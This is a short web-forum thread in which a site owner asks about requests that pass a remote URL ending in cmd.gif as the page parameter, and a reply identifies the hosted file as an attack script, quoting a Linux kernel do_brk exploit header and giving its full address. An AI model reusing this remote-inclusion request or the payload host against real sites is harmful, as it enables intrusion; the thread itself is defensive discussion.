Atempting to hack my site

  • b8edbreth
  • Born
  • Born
  • b8edbreth
  • Posts: 2

Post 3+ Months Ago

I have been seeing something odd lately. My website uses mysql to store it's html and the index page displays it based on the variable passed in each link. example: http://www.mysite.com/?page=home
I have seen a number of people attempting to exploit this by requesting urls like: http://mysite.com/?page=http://www.cige ... .0/cmd.gif?
Which because of the way my site works does nothing but bring up a blank page. I am wondering what exactly they are trying to exploit. Does any one have info on this?

April.
  • Anonymous
  • Bot
  • No Avatar
  • Posts: ?
  • Loc: Ozzuland
  • Status: Online

Post 3+ Months Ago

  • lucassix
  • Mastermind
  • Mastermind
  • User avatar
  • Posts: 2350
  • Loc: Indiana

Post 3+ Months Ago

If you go and look at http://www.ciget.com.ve/.0/cmd.gif it is really a script which the attacker is passing variables to.

Quote:
" * Linux kernel do_brk vma overflow exploit.\n" .
" *\n" .
" * The bug was found by Paul (IhaQueR) Starzetz <paul@isec.pl>\n" .
" *\n" .
" * Further research and exploit development by\n" .
" * Wojciech Purczynski <cliph@isec.pl> and Paul Starzetz.\n" .
" *\n" .
" * (c) 2003 Copyright by IhaQueR and cliph. All Rights Reserved.\n" .
" *\n" .
" * COPYING, PRINTING, DISTRIBUTION, MODIFICATION, COMPILATION AND ANY USE\n" .
" * OF PRESENTED CODE IS STRICTLY PROHIBITED.\n" .


http://isec.pl/papers/linux_kernel_do_brk.pdf
  • b8edbreth
  • Born
  • Born
  • b8edbreth
  • Posts: 2

Post 3+ Months Ago

Well its a good thing that the way my script works, it doesn't load anything from or into that varaible but uses it to find a piece of data. The data cannot be found because the page value is invalid and thus the screen goes blank.

Post Information

  • Total Posts in this topic: 3 posts
  • Users browsing this forum: No registered users and 10 guests
  • You cannot post new topics in this forum
  • You cannot reply to topics in this forum
  • You cannot edit your posts in this forum
  • You cannot delete your posts in this forum
  • You cannot post attachments in this forum
 
 

© 1998-2014. Ozzu® is a registered trademark of Unmelted, LLC.